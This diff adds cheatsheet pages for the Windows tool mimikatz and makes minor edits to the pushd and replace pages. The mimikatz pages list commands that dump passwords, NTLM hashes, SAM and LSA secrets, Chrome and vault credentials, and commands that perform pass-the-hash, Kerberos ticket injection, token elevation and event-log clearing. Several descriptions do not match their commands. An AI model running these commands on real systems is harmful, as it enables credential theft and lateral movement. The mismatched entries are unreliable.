Update cheatsheets

tldr/windows/mimikatz

@@ -0,0 +1,42 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz
+
+> Interact with Windows credentials, perform credential dumping, token manipulation, and more.
+> Requires administrator privileges and typically runs on Windows.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- Run mimikatz in interactive mode:
+
+`mimikatz`
+
+- Enable debug privileges (needed for most operations):
+
+`mimikatz "privilege::debug"`
+
+- List available logon sessions:
+
+`mimikatz "sekurlsa::logonpasswords"`
+
+- Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory:
+
+`mimikatz "sekurlsa::logonpasswords"`
+
+- Pass-the-Hash with a specific NTLM hash and launch a command:
+
+`mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"`
+
+- Dump local SAM database hashes:
+
+`mimikatz "lsadump::sam"`
+
+- Extract Kerberos tickets and export to a file:
+
+`mimikatz "kerberos::list /export"`
+
+- Exit mimikatz:
+
+`exit`

tldr/windows/mimikatz-crypto

@@ -0,0 +1,21 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz crypto
+
+> Manipulate Windows cryptographic services and certificates.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- List cryptographic providers:
+
+`mimikatz "crypto::providers"`
+
+- List keys in a cryptographic provider:
+
+`mimikatz "crypto::capi"`
+
+- Export certificates and keys:
+
+`mimikatz "crypto::certificates /export"`

tldr/windows/mimikatz-dpapi

@@ -0,0 +1,21 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz dpapi
+
+> Interact with the Windows Data Protection API (DPAPI).
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- List master keys:
+
+`mimikatz "dpapi::masterkey /list"`
+
+- Decrypt a DPAPI blob:
+
+`mimikatz "dpapi::blob /in:blob_file.bin"`
+
+- Retrieve Chrome credentials using DPAPI:
+
+`mimikatz "dpapi::chrome /in:Login Data"`

tldr/windows/mimikatz-event

@@ -0,0 +1,17 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz event
+
+> Manage Windows Event Log records.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- Clear event logs:
+
+`mimikatz "event::clear"`
+
+- Display event log sources:
+
+`mimikatz "event::providers"`

tldr/windows/mimikatz-kerberos

@@ -0,0 +1,21 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz kerberos
+
+> Interact with Kerberos tickets.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- List current Kerberos tickets:
+
+`mimikatz "kerberos::list"`
+
+- Purge all Kerberos tickets:
+
+`mimikatz "kerberos::purge"`
+
+- Inject a ticket from a `.kirbi` file:
+
+`mimikatz "kerberos::ptt ticket.kirbi"`

tldr/windows/mimikatz-lsadump

@@ -0,0 +1,22 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz lsadump
+
+> Dump secrets from the Windows Local Security Authority (LSA).
+> Requires SYSTEM privileges.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- Dump SAM hashes:
+
+`mimikatz "lsadump::sam"`
+
+- Dump secrets from the SECURITY hive:
+
+`mimikatz "lsadump::secrets"`
+
+- Dump cached domain credentials:
+
+`mimikatz "lsadump::cache"`

tldr/windows/mimikatz-misc

@@ -0,0 +1,21 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz misc
+
+> Miscellaneous system and utility commands.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- Trigger Blue Screen of Death (for testing):
+
+`mimikatz "misc::bsod"`
+
+- List loaded kernel drivers:
+
+`mimikatz "misc::minidump"`
+
+- Change system time:
+
+`mimikatz "misc::systemtime"`

tldr/windows/mimikatz-net

@@ -0,0 +1,21 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz net
+
+> Perform network and domain operations.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- List domain users:
+
+`mimikatz "net::users"`
+
+- List domain computers:
+
+`mimikatz "net::computers"`
+
+- Retrieve domain controller information:
+
+`mimikatz "net::domaincontrollers"`

tldr/windows/mimikatz-privilege

@@ -0,0 +1,17 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz privilege
+
+> Manage privileges for mimikatz operations.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- Enable debug privilege (required for many modules):
+
+`mimikatz "privilege::debug"`
+
+- Check current privilege state:
+
+`mimikatz "privilege::whoami"`

tldr/windows/mimikatz-process

@@ -0,0 +1,17 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz process
+
+> Manage process privileges and tokens.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- List processes with their tokens:
+
+`mimikatz "process::list"`
+
+- Elevate mimikatz to a SYSTEM process:
+
+`mimikatz "process::token /user:NT AUTHORITY\SYSTEM"`

tldr/windows/mimikatz-sekurlsa

@@ -0,0 +1,22 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz sekurlsa
+
+> Extract credentials and secrets from memory.
+> Requires debug privileges.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- Extract plaintext passwords:
+
+`mimikatz "sekurlsa::logonpasswords"`
+
+- List Kerberos tickets in memory:
+
+`mimikatz "sekurlsa::tickets"`
+
+- Dump LSA secrets:
+
+`mimikatz "sekurlsa::secrets"`

tldr/windows/mimikatz-service

@@ -0,0 +1,21 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz service
+
+> Manage Windows services through mimikatz.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- Start a service:
+
+`mimikatz "service::start service_name"`
+
+- Stop a service:
+
+`mimikatz "service::stop service_name"`
+
+- Delete a service:
+
+`mimikatz "service::delete service_name"`

tldr/windows/mimikatz-standard

@@ -0,0 +1,21 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz standard
+
+> Basic commands and mimikatz environment management.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- Display system information:
+
+`mimikatz "standard::info"`
+
+- Clear the mimikatz command history:
+
+`mimikatz "standard::clearev"`
+
+- Show command history:
+
+`mimikatz "standard::history"`

tldr/windows/mimikatz-token

@@ -0,0 +1,21 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz token
+
+> List and manipulate security tokens.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- List tokens:
+
+`mimikatz "token::list"`
+
+- Elevate privileges by impersonating a token:
+
+`mimikatz "token::elevate"`
+
+- Revert to original token:
+
+`mimikatz "token::revert"`

tldr/windows/mimikatz-vault

@@ -0,0 +1,17 @@
+---
+syntax: markdown
+tags: [tldr, windows]
+source: https://github.com/tldr-pages/tldr.git
+---
+# mimikatz vault
+
+> Extract credentials stored in the Windows Credential Vault.
+> More information: <https://github.com/gentilkiwi/mimikatz>.
+
+- List vault credentials:
+
+`mimikatz "vault::list"`
+
+- Dump all vault credentials:
+
+`mimikatz "vault::cred"`

tldr/windows/pushd

@@ -6,7 +6,7 @@ source: https://github.com/tldr-pages/tldr.git
 # pushd
 
 > Place a directory on a stack so it can be accessed later.
-> See also `popd` to switch back to original directory.
+> See also: `popd` to switch back to original directory.
 > More information: <https://learn.microsoft.com/windows-server/administration/windows-commands/pushd>.
 
 - Switch to directory and push it on the stack:

tldr/windows/replace

@@ -6,7 +6,7 @@ source: https://github.com/tldr-pages/tldr.git
 # replace
 
 > Replace files.
-> See also: `robocopy`, `move`, `copy`, and `del`.
+> See also: `robocopy`, `move`, `copy`, `del`.
 > More information: <https://learn.microsoft.com/windows-server/administration/windows-commands/replace>.
 
 - Replace the destination file with the one from the source directory: